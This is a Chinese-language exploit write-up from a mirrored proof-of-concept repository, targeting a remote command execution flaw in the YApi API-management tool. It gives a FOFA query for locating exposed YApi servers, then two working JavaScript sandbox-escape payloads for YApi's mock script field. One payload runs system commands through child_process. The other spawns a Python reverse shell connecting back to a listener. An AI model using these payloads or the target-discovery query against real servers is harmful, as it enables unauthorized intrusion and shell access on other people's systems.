admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Yapi/Yapi存在远程命令执行漏洞.md

61 lines
2.3 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# Yapi存在远程命令执行漏洞
# 一、漏洞简介
Yapi存在远程命令执行漏洞
# 二、影响版本
+ Yapi
# 三、资产测绘
+ fofa`app="YApi"`
+ 特征
![1733889052543-d9462fa4-5ed8-49c3-90e0-0e22bdb0bf3d.png](./img/R4R5xyBZVQ_9RrKW/1733889052543-d9462fa4-5ed8-49c3-90e0-0e22bdb0bf3d-882788.png)
# 四、漏洞复现
注册账号登录
![1733889068979-94f17c91-b7c5-4736-b63a-ec608cf02a06.png](./img/R4R5xyBZVQ_9RrKW/1733889068979-94f17c91-b7c5-4736-b63a-ec608cf02a06-740149.png)
新建项目
![1733889103239-3d32f9de-1ae6-4668-802b-4ba25b36ede2.png](./img/R4R5xyBZVQ_9RrKW/1733889103239-3d32f9de-1ae6-4668-802b-4ba25b36ede2-659707.png)
添加接口
![1733889123950-560b7590-201a-477d-98e0-aba7da89b62a.png](./img/R4R5xyBZVQ_9RrKW/1733889123950-560b7590-201a-477d-98e0-aba7da89b62a-577318.png)
```java
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()
```
![1733889157562-bdbc7f22-a8c2-4a3c-a54a-4203d7dd3622.png](./img/R4R5xyBZVQ_9RrKW/1733889157562-bdbc7f22-a8c2-4a3c-a54a-4203d7dd3622-586119.png)
![1733889175163-7053a924-2cc1-4bbf-9f22-18d333698b52.png](./img/R4R5xyBZVQ_9RrKW/1733889175163-7053a924-2cc1-4bbf-9f22-18d333698b52-059135.png)
![1733889186745-cec84584-2bb5-4a9f-af14-0c06944989d7.png](./img/R4R5xyBZVQ_9RrKW/1733889186745-cec84584-2bb5-4a9f-af14-0c06944989d7-172808.png)
反弹shell
```java
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
Poc = process.mainModule.require("child_process").spawnSync(
'python', ['-c', 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",6699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
)
```
![1733892630767-39caa4e3-fb60-405e-99ef-5c4ac2d09df8.png](./img/R4R5xyBZVQ_9RrKW/1733892630767-39caa4e3-fb60-405e-99ef-5c4ac2d09df8-057460.png)
> 更新: 2024-12-20 14:53:54
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zwurnkdpoozs08fc>
Reference in New Issue Copy Permalink